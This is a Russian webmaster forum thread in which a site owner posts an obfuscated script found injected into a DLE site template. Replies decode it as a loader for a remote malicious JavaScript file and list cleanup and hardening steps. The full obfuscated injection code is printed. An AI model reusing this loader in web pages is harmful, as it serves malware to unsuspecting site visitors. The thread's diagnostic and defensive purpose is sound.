Взломали сайт

xobbit
На сайте с 25.03.2010
Offline
45
1028

Есть один сайт на ДЛЕ. Захожу в статистику, траф в 10 до 4 к упал.. ПОнять ничего не могу, все позиции на месте, все ок.. Потом глянул внимательнее.. Смотрю "Сайт может угрожать безопасности вашего компьютера"..

Полез копаться в шаблоне нашел это

<noindex><script>var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!115!114!99!61!34!104!116!116!112!58!47!47!105!100!52!48!53!52!51!46!115!114!118!100!97!116!97!46!114!117!47!109!105!102!46!106!115!34!62!60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);</script></noindex>

Что это вообще такое? Заранее спасибо!

K
На сайте с 29.02.2008
Offline
116
kdj
#1

ссылка на скрипт с вирусам "http://id40543.srvdata.ru/mif.js" зашифрованая в ASCII

если сайт продвигается, то как можно скорее

1. удалите все подобные строки из кода

2. проверьте сервер на наличие шелов

3. выясните как залили шелл и примете меры по предотвращению подобного.

ПС могу наложить бан из-за редиректа и вирусов

danmaster
На сайте с 04.02.2007
Offline
290
#2
xobbit:


Что это вообще такое? Заранее спасибо!

Смотри файл dbconfig.php (в самом конце), только вчера такую хрень сносили. А потом проверяй все остальные

BadBoy
На сайте с 31.01.2005
Offline
308
#3

проверить все доп. модули, проверьте на наличие левых файлов, обновите скрипт двигла.

тоже избавлялся от кариозных монстров.

F
На сайте с 10.09.2009
Offline
99
#4

Нашли что-нибудь? Поделитесь пожалуйста

У друга 1-й раз заметили этот код 29-го, вчера 2-й раз.

В первый раз он его просто удалил. Через некоторое время файл dbconfig.php был просто удален кем-то. Что хоть там дописано было в конце? В этот раз все на месте, в этом файле ничего лишнего.

В этот раз отметил, что изменилась дата у файла engine.php. Сверил с оригиналом построчно- ничего не изменилось.

Версия DLE 7.5 Авторизация стояла простая, файл админки не переименован.

На этом же сервере еще 2 десятка сайтов на этом же движке. Они не тронуты. (Был бы шелл- уже наверное поковырялись бы).

[Удален]
#5

1. установите время изменения файла с вредоносным кодом

2. найдите все файлы, которые были изменены в это же время

3. почистите код в них

4. найдите в логах http это время и отсортируйте по POST. Залочте в IP с которого Вам закинули этот код

5. Если в http этого нет, то поищите в логах FTP

6. поменяйте все пароли которые связаны с этим пользователем и сайтом (админка, фтп, ссх)

7. ограничте доступ к админке, фтп, ссх только с доверенных IP и подсетей

Andreyka
На сайте с 19.02.2005
Offline
822
#6

mod_security решает 90% проблем

Не стоит плодить сущности без необходимости

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий